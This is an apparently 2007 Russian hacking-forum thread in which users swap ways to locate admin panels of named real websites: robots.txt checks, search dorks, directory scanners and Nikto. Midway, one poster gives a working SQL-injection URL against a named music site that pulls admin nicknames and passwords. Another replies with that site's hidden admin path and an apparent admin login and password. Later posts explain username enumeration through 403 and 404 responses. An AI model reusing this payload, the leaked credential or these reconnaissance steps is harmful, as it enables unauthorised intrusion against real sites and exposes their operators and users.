Вопрос по обнаружению админок на сайте

Discussion in 'Песочница' started by Termin@L, 6 Aug 2007.

  1. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Народ, подскажите какие есть способы найти админку на сайте, очень интересует, много всего перепробовал...
    Есть сайт msk-bank.ru, никак не могу найти
     
  2. Ni0x

    Ni0x Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    338
    Likes Received:
    157
    Reputations:
    37
    первым делом проверь на robots.txt, затем поскань структуру сайта сканером, можно пройтись поисковиком, ручной подбор также использовать можно.
     
  3. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    главный способ по обнаружению админок это inurl:"site" inurl:"admin"
    но по ходу на сайте msk-bank.ru нет админки , мож я ошибаюсь
     
    #3 _-Ramos-_, 6 Aug 2007
    Last edited: 6 Aug 2007
  4. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    тогда уж лучше inurl:"admin" site:'site'
     
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Сканер директорий юзать надо)

    Не знаю, что в пабле валяется нормальное, но при наличии хорошей базы-словаря можно найти много чего)
     
  6. lMCl

    lMCl New Member

    Joined:
    4 Aug 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    название сканера можно в студию? :)
     
  7. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    Писал вещичку на питоне.. легкие сайты с широких каналов валит :)

    Ps Пробей домены на этом же айпи/хосте, можт у админки адрес другой. врятли бы и другой айпи ей давали :)
    хотя я гемороился пару раз :))
     
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    В избранном на античате есть pelmeshka сканер. вообще их ооочень много. выбирай на вкус. я иногда юзаю nikto
     
  9. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    http://forum.antichat.ru/thread40031.html
     
  10. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    rap.ru
    На данном сайте существует бага, скуль
    http://www.rap.ru/page.php?path=/survey&survey_id=-1+union+select+1,2,concat(Nick,char(58),Passwd),4+from+Admins/*
    а также есть админка
    http://www.rap.ru/admin

    Однако пароли не подходят, поиск других админок ничего не дал, может кто родскажет, что к чему и почему ничего не получается?

    P.S. сканирование Nikto дало помимо всего такой результат -
    + /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
    Не совсем понимаю, что это значит.
     
    #10 Termin@L, 8 Aug 2007
    Last edited: 8 Aug 2007
  11. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Termin@L, бага такая...коннектишься к серверу на 22 порту (кажеца, если не прав - поправьте), и можешь перебирать логины вот так: /~admin /~vasya. Т.е. можно узнать имя юзера.
     
    2 people like this.
  12. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    тебе ответили в этой теме что делать, а ты неудосужился прочитать..

    http://www.rap.ru/robots.txt
    Code:
         User-agent: *
         Disallow: /_Includes
    [COLOR=yellow]     Disallow: /_Admin[/COLOR]
         Disallow: /_Images
         Disallow: /_Files
         Disallow: /_Templates
         Disallow: /_Style
    http://www.rap.ru/_Admin/
    Administrator:nfnec
     
    _________________________
    1 person likes this.
  13. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    Спасибо большое, извиняюсь, забыл
     
  14. George767

    George767 Elder - Старейшина

    Joined:
    10 Jan 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    А какой дурак будет в robots прописывать закрытые разделы?! Я на своих сайтах подобные разделы закрываю от индексирования поисковиков с помощью мета-тегов. Да и админки у меня вида Mfi8ernj58j, тем более найти парадный вход эт одно, далее взломать его над))
     
  15. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    дураки дураками, а тем не менее, адреса админок в robots.txt встречаются очень часто при наличии этого файла.
    Тем более, от SQL на сайте никто не застрахован, и твой пароль можно достать при использовании админкой sql-базы.
     
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    как это на 22 порт? если ты по SSH приконектился, то в подавляющем большинстве случаев пользователей можно посмотреть в /etc/passwd

    Ну тоесть можно подобрать имена пользователей... если ответ сервера 403 (Forbidden) значит пользователь существует, если 404 (not found) значит такого несуществует... например ecли зайти http://www.rap.ru/~vasya и серв ответит 403 (Forbidden) (или зайдет по этому адресу) значит пользователь vasya точно существует, а если 404 (not found) то пользователя vasya может не быть...
     
Loading...
Similar Threads - Вопрос обнаружению админок
  1. gilo20
    Replies:
    2
    Views:
    2,545
  2. Dobi768
    Replies:
    2
    Views:
    2,445
  3. avva99on
    Replies:
    0
    Views:
    2,442